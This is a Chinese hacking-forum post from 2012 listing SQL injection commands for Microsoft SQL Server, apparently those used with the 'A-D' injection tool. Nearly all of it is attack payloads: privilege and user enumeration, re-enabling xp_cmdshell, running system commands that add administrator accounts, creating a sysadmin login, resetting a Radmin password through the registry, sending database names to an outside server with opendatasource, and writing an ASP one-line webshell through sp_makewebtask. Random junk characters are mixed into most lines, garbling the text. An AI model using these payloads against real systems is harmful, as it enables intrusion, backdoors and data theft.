找回密码
 立即注册
查看: 2239|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
# U3 v& l* V* C3 s: S//看看是什么权限的7 t) m5 G; c- ^6 o1 Q( M1 a  q
and 1=(Select IS_MEMBER('db_owner'))& _( G( C7 G5 Y
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--& i( q+ Y: I' O6 p4 T  w) T
# z! y2 M" ^" ?" ~
//检测是否有读取某数据库的权限( g, H2 G% M$ Z2 c+ v* L
and 1= (Select HAS_DBACCESS('master'))1 h( B. |- T# ~
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
: D/ {7 i* P" K0 ^; p9 J( u' j
4 K9 R" Z) j5 y; ]& ?4 W: \. G! C% Y& D8 A
数字类型
  U' W6 F' p( v  p* I, G8 Kand char(124)%2Buser%2Bchar(124)=0
7 d- Y& m9 m. P" O/ Q" c% f- _; Q/ c6 G: y( C" U
字符类型
3 i# b* H4 V1 ^+ Z' and char(124)%2Buser%2Bchar(124)=0 and ''='+ d$ T2 {: P. p) P) f( R( [
6 u" L& q" }6 k
搜索类型
1 |) m0 h" I1 J' and char(124)%2Buser%2Bchar(124)=0 and '%'='0 c! B1 A2 k1 Y3 q1 C; E4 ^  u3 h
; L9 H: f( \# ~, N7 \
爆用户名( i1 N+ \1 @$ F1 a# M
and user>0
0 c: a7 j9 `3 U' and user>0 and ''='
& p: E0 z) l6 O0 ?+ }* V2 {2 @; ~$ g+ `. m+ }3 n5 L
检测是否为SA权限9 N1 |, g: ~  D! J8 i
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--, I7 e* G6 W5 h
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
( M9 P$ B1 Y5 Q/ U) T3 I5 W, d9 ^. y9 y3 T
检测是不是MSSQL数据库8 j0 Y4 F, p9 a- B/ I2 O, A- Q; f
and exists (select * from sysobjects);--
* k* t; V3 r  X( M
' t' |. W* W7 a$ I) {$ M# {4 ]检测是否支持多行
& [% ?( @6 k4 j) Y;declare @d int;-- 2 L$ A0 F) C8 {; J, l
9 B) \9 H8 k. u- B  Y; q9 ~. c! o
恢复 xp_cmdshell
, P# `; k$ \  H;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
: `* p# ]8 z0 D& G5 t2 c
. F/ p6 t. s2 ?: ?
& C7 B6 a4 r9 e: \. _select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') " Q7 |2 c. i3 K# k
2 V, w0 P/ K/ H5 y: d  K% V* k' a" |
//-----------------------/ q! }* i( X( l6 x6 t% R
//      执行命令( k# T5 b/ T9 q; B+ {
//-----------------------
4 o1 c  ]" \, c首先开启沙盘模式:
& z& `4 @" e/ H& B$ H/ g* [! z* iexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',19 A. E7 p5 `: \0 V

  R0 s5 A6 K4 F& i5 V然后利用jet.oledb执行系统命令
1 S7 `" ^8 b0 C2 e0 cselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')+ _0 d- v5 x! g9 `, l2 L

1 y( C. X6 Y: n7 w. ~7 b4 _执行命令
* p  I3 R! T; i( {;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
; O' F( }- G* U3 z% N2 F! J/ K& V2 y& |! z
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'  C1 w( g$ K  _( l

; u6 G* \- [7 l, A5 x判断xp_cmdshell扩展存储过程是否存在:) x. k3 O/ b6 P9 g( e9 A6 J
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
8 g2 q( {7 R5 ^  p7 ]* v( `
; ^- u9 I  Q- u7 V写注册表
  ]/ t  f4 ~$ m3 e) e4 vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1+ J3 u9 M8 Q/ w! N
- ^/ y+ t( b) |9 j. m
REG_SZ
  J2 z+ i  j( Y, {$ o
* j: ^! h4 N# S读注册表' N, @& \- l0 K+ a' |
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
5 |+ P1 Z8 J5 l5 i6 D4 k4 H% e6 _& E5 w2 o% c
读取目录内容
2 M5 k  P6 f/ t7 Z5 xexec master..xp_dirtree 'c:\winnt\system32\',1,1
+ p0 r6 V: T9 a( O1 U% Q7 _( u6 {. G4 p1 B+ K3 H; ]3 a, m+ x; A* T

) r! _/ i9 o; a1 u, m. P" l数据库备份) ?4 p; {* r  \4 G! P# W# V
backup database pubs to disk = 'c:\123.bak'
; e* U. M1 ~% W" `0 S
! A! C. x' t5 @8 E+ w8 h- a! d$ y//爆出长度2 }2 T0 Q* G# N- y
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
) D+ ?: m' {' y. I, I. @' f4 x, {% J; U* \, H8 N
) }7 T" x% Q8 t

) p) D* ?" s) O) [( W, [- W更改sa口令方法:用sql综合利用工具连接后,执行命令:
/ O4 q! z+ ~! u" v: J0 o" N( K- Wexec sp_password NULL,'新密码','sa'
4 a+ w' k1 k' s% C4 Z  U% x/ {
添加和删除一个SA权限的用户test:
# E5 {2 Z1 E' j" zexec master.dbo.sp_addlogin test,ptlove3 }, Y$ E8 A# S" X) r  W/ X* R
exec master.dbo.sp_addsrvrolemember test,sysadmin
4 |9 z9 d1 y' `( R: y& L) e4 F( m/ n8 b) z  U
删除扩展存储过过程xp_cmdshell的语句:
8 o4 |$ X) u3 f# Q0 k8 B& a" xexec sp_dropextendedproc 'xp_cmdshell'
! \5 E# c2 k3 A2 O4 f2 U; C; W( C* R6 C
添加扩展存储过过程
' k& J; }7 f- |) P6 H$ T" oEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
) R5 ~7 ~" [2 P7 L* L# \) Y( V% rGRANT exec On xp_proxiedadata TO public 5 p. O; M* k2 M0 s/ n" Y6 u+ V% v
9 j4 g  w5 t, N  _( V3 f3 q2 J
, J2 y, J2 W( R& X1 F
停掉或激活某个服务。 2 c% c2 m* k, W6 a

2 h# V# I: z- Q2 ?exec master..xp_servicecontrol 'stop','schedule'
, P/ }# d4 G* ^7 Y7 @+ vexec master..xp_servicecontrol 'start','schedule'
4 b* s6 q6 B/ g8 _% L5 {5 v; X  @: J' {# W+ }+ K
dbo.xp_subdirs
- B2 |% h" ?3 x5 f6 {2 D
) ]/ _- F: N/ ]! k只列某个目录下的子目录。
" G" g" \/ z6 jxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'4 ^! A0 R: n! F" x& j+ j- I( m9 R

, h9 N" L( I0 }# U9 b' k2 [. j# idbo.xp_makecab
4 i! K/ I7 l( S" a, J7 d9 Z
- s' [' O8 r- {- {3 @2 N将目标多个档案压缩到某个目标档案之内。
# g: L' z8 ?* p% M) l所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。4 q/ U; }5 H( C& V9 j  h( t0 ~/ ^
5 }3 q9 `9 f( Y% t
dbo.xp_makecab- N# D0 a) R* g9 \  ?) Z) z; q; x
'c:\test.cab','mszip',1,2 w( L4 N8 t: ^3 d
'C:\Inetpub\wwwroot\SQLInject\login.asp',
. C6 Z3 k: g% F7 @& ^$ h2 z'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'& i0 s/ k$ d2 V; {3 y

! D0 c- x7 |% D6 K( m( X  m" Bxp_terminate_process7 j; R+ e7 L% i0 P" `3 x' A

/ _* S$ f. U; E: F9 m- Z停掉某个执行中的程序,但赋予的参数是 Process ID。+ q/ t) _( R- ^; k3 G
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
$ t$ H- Y7 C+ x  s6 C7 o! ~9 B9 q" q% }  |' K0 P8 e4 K$ [! z: w
xp_terminate_process 2484+ H0 W$ t/ |- O: o/ p6 F. j

! L5 H& t- r1 C! j% k9 _- kxp_unpackcab$ i! |% \% g. I5 V+ h0 |* x

, G2 a8 n& r* M3 B0 f' o解开压缩档。+ j9 i8 G% n( O

# C$ [5 u+ t9 T3 f9 e5 xxp_unpackcab 'c:\test.cab','c:\temp',1, c/ I* g, T! F0 s- u' Z

; ]! M0 ?2 J0 N" j
8 A- h; `3 E# A% D% I某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12341 Y5 E0 e9 K6 Y
- b2 T5 |, X2 C2 D; H" w
create database lcx;
, E% {. m3 t- _2 SCreate TABLE ku(name nvarchar(256) null);4 Y! G% a( G- d% Y
Create TABLE biao(id int NULL,name nvarchar(256) null);
  R; t: {+ Q9 Q* x* A2 q9 V. l$ Z: f; g$ X
//得到数据库名: l3 h: o$ b& l5 V6 w
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
$ z6 {3 ?2 T% q7 [( _1 X1 m+ U& n2 ?! X9 Q8 m! x8 O! E
5 p  `2 C3 H" [: c; }& i* p6 t
//在Master中创建表,看看权限怎样
9 \# Y) _4 @! a7 s+ f2 H. Z* W1 XCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--* H: Q3 _0 ?/ ^) b$ s

7 \9 N/ ~% C2 b3 C% t! n用 sp_makewebtask直接在web目录里写入一句话马:3 ?5 k9 Y- d" I! i/ b9 p
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--$ C  E! ~: i1 Z

/ S! t+ Z) p1 E* V( a4 U7 ^. x3 o//更新表内容
: n! `) r( T4 ZUpdate films SET kind = 'Dramatic' Where id = 123
6 P2 i  S2 S) C- \9 p" V/ m
/ ?3 s& P6 W3 n0 v# b5 Y//删除内容4 u( _* c/ C6 a* f( H: d* R% D
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表